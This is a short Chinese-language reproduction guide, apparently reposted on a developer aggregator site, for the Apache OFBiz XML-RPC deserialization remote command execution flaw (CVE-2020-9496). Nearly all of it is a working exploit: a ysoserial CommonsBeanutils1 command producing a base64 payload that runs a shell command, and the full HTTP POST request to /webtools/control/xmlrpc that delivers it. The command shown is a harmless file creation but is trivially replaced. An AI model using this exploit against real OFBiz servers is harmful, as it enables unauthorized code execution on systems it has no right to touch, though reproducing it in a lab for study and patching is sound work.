概述
漏洞复现
使用ysoserial的CommonsBeanutils1来生成Payload,使用命令生成base64的payload:
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "n"
将base64的payload替换并发送以下数据包:
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
返回靶机查看
最后
以上就是彩色羊为你收集整理的Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)的全部内容,希望文章能够帮你解决Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复